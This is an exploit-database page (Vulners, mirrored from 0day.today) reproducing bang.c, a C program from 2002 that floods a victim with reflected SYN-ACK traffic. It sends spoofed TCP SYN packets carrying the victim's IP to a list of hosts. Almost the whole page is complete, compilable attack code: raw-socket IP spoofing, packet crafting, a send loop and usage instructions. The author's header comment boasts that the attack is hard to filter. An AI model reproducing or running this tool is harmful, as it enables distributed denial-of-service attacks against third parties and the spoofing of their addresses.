Vulners
Lucene search
TCP SYN Denial of Service Exploit (bang.c)
==========================================
TCP SYN Denial of Service Exploit (bang.c)
==========================================
/*
* BANG.C Coded by Sorcerer of DALnet
*
* FUCKZ to: etech, blazin, udp, hybrid and kdl
* PROPZ : skrilla, thanks for all your help with JUNO-Z and especially this code :)
* --------------------------------
* REDIRECTION DOS FINALLY DISTRIBUTED !!!!!!
*
* This is POC and demonstrates a new method of DoS. The idea
* behind it is that the attacker generates connection requests
* to a list of hosts which have a TCP service running such as
* http (80), telnet (23) etc. from the ip of the victim host.
* This will result all of the hosts that the victim *requested*
* connections to send back packets (usually SYN-ACK's) 2-3 of
* them (amplification comes here!) causing load to the victim
* by cauzing the victim to send RST packets since it never actually
* requested any such connection. This attack is dangerous since
* its almost impossible to filter!!
*
* hosts file should be in the format of 1 ip:port per line
* i.e. 194.66.25.97:80
* 130.88.172.194:23
* 65.161.42.42:6667
* NOTE: target should only be ip, and all the hosts on the list should
* also be ips thats for speed issues.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#define __FAVOR_BSD
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
unsigned short int getrandportid(void);
unsigned short in_cksum(u_short *addr, int len);
short int send_syn(unsigned long int , unsigned long int, unsigned short int);
int sox;
struct pseudo {
unsigned long srca, dsta;
unsigned char zero, proto;
unsigned short tcplen;
};
struct checksum {
struct pseudo pp;
struct tcphdr tt;
};
/* Taken out since only works on x86 and rdtsc is also only pentium specific */
#if 0
/* Thanks to skrilla :) */
unsigned short mktcpsum1(struct packet *p,int len) {
unsigned short old_sum = p->tcpsum;
unsigned long s = (unsigned long)&p->sport;
unsigned long sum = ((p->src >> 16) + (p->src & 0xffff) + (p->dst >> 16) +
(p->dst & 0xffff) + (__htons__(6) + __htons__(len-20)));
p->tcpsum=0;
__asm__ __volatile__ (
/*"xorl %%eax,%%eax;"
"cmpl $2,%%ecx;"
"jb 1f;"
"0:;"
"lodsw;"
"addw %%ax,%%dx;"
"jnc 9f;"
"addl $65536,%%edx;"
"9:;"
"decl %%ecx;"
"loop 0b;"
"1:;"
"orb %%cl,%%cl;"
"jz 2f;"
"xorw %%ax,%%ax;"
"lodsb;"
"addw %%ax,%%dx;"
"jnz 2f;"
"addl $65536,%%edx;"
"2:;"
"movw %%dx,%%ax;"
"shrl $16,%%edx;"
"addw %%ax,%%dx;"
"adcl $0xffff0000,%%edx;"
"xorw $65535,%%dx;"*/
"movw %%dx,%%ax;"
"shrl $16,%%edx;"
"addw %%ax,%%dx;"
"adcw $0,%%dx;"
"testl $1,%%ecx;"
"jz 0f;"
"xorw %%ax,%%ax;"
"lodsb;"
"addw %%ax,%%dx;"
"adcw $0,%%dx;"
"0:;"
"shrl $1,%%ecx;"
"1:;"
"lodsw;"
"addw %%ax,%%dx;"
"adcw $0,%%dx;"
"loop 1b;"
"andl $65535,%%edx;"
"xorw $65535,%%dx;"
:"=edx"(sum):"edx"(sum),"ecx"(len-20),"S"(&p->sport):"eax");
p->tcpsum=old_sum;
return(sum);
}
unsigned long long int
rdtsc(void) {
unsigned long long int tsc;
unsigned long int tsc_l,tsc_h;
__asm__ volatile("rdtsc":"=%eax"(tsc_l),"=d"(tsc_h));
tsc=tsc_h;
tsc=(tsc<<32)|tsc_l;
return(tsc);
}
#endif
int
main(int argc, char **argv)
{
int enable=1,tmp,tmp2, loop, count=0;
char *lala, *tmp1, buf[25];
unsigned long int ip[1000000], src;
unsigned short int port[1000000];
FILE *fp;
struct timeval start, end;
printf("\nCoded by Sorcerer of DALnet\n\n");
if(argc != 4){
fprintf(stderr, "Incorrect usage try: %s <victim> <host-file> <loop host-file>\a\n", *argv);
fprintf(stderr, "Example: %s 127.0.0.1 myhostsfile.txt 3\n\n", *argv);
return(-1);
}
fp = fopen(argv[2], "r");
if(fp == NULL){
fprintf(stderr, "Error while opening: %s\n", argv[2]);
perror("fopen");
return(-1);
}
loop = atoi(argv[3]);
if(loop == 0){
fprintf(stderr, "Cannot loop 0 times you need to loop at least once\n");
return(-1);
}
for(tmp=0;tmp<=1000000;tmp++){
ip[tmp] = htons(23);
port[tmp] = htons(23);
}
sox = socket(PF_INET, SOCK_RAW, 6);
if(sox == -1){ perror("socket"); return(-1); }
tmp = setsockopt(sox, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
if(tmp == -1){ perror("setsockopt"); return(-1); }
printf("Reading ips on memory and reconstructing in network byte order...\n"); fflush(stdout);
while(1){
memset(buf, 0, 25);
tmp1 = fgets(buf, 25, fp);
if(tmp1 == NULL) break;
if(strlen(buf) < 9) {
printf("Bogus entry: %s\n", buf);
continue;
}
lala = strchr((char *)&buf, ':');
port[count] = htons(atoi(++lala));
buf[strlen(buf)-strlen(lala)-1] = '\0';
ip[count] = inet_addr(buf);
count++;
printf("."); fflush(stdout);
}
printf("Done.\n");
src = inet_addr(argv[1]);
tmp = gettimeofday((struct timeval *)&start, NULL);
if(tmp == -1){ perror("gettimeofday"); return(-1); }
for(tmp2=0;tmp2<loop;tmp2++)
for(tmp=0;tmp<count;tmp++)
send_syn(src, ip[tmp], port[tmp]);
tmp = gettimeofday((struct timeval *)&end, NULL);
if(tmp == -1){ perror("gettimeofday"); return(-1); }
printf("\nTotal time taken: %lu\nBytes sent: %d\n", (end.tv_sec+end.tv_usec)-(start.tv_sec+start.tv_usec), count*loop*sizeof(char)*sizeof(struct ip)*sizeof(struct tcphdr));
return 0;
}
short int
send_syn(unsigned long int src, unsigned long int dst, unsigned short int port)
{
struct sockaddr_in s;
struct ip *i;
struct tcphdr *t;
struct pseudo p;
struct checksum c;
char packet[sizeof(char)*(sizeof(struct ip)+sizeof(struct tcphdr))];
int tmp;
s.sin_family = PF_INET;
s.sin_port = port;
s.sin_addr.s_addr = dst;
i = (struct ip *)&packet;
t = (struct tcphdr *)((int)i+sizeof(struct ip));
memset(&packet, 0, sizeof(packet));
i->ip_hl = 5;
i->ip_v = 4;
i->ip_tos = 0x08;
i->ip_len = htons(sizeof(packet));
i->ip_id = htons(getrandportid());
i->ip_off = 0;
i->ip_ttl = 255;
i->ip_p = 6;
i->ip_sum = 0;
i->ip_src.s_addr = src;
i->ip_dst.s_addr = dst;
t->th_sport = htons(getrandportid());
t->th_dport = port;
t->th_seq = htons(getrandportid());
t->th_ack = 0;
t->th_x2 = 0;
t->th_off = 5;
t->th_flags = 0x02;
t->th_win = 65535;
t->th_urp = 0;
t->th_sum = 0;
p.srca = src;
p.dsta = dst;
p.proto = 6;
p.tcplen = htons(sizeof(struct tcphdr));
p.zero = 0;
memcpy(&c.pp, &p, sizeof(p));
memcpy(&c.tt, t, sizeof(struct tcphdr));
t->th_sum = in_cksum((void *)&c, sizeof(c));
tmp = sendto(sox, packet, ntohs(i->ip_len), MSG_DONTWAIT, (struct sockaddr *)&s, sizeof(s));
if(tmp == -1){
perror("sendto");
return(-1);
}
return 0;
}
unsigned short int
getrandportid(void)
{
unsigned short int port;
struct timeval tv;
gettimeofday((struct timeval *)&tv, NULL);
srand(tv.tv_sec+tv.tv_usec);
port = rand()+1;
return(port);
}
/* Slow shit checksum function from RFC */
u_short
in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
# 0day.today [2018-02-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Sep 2002 00:00Current
7High risk
Vulners AI Score7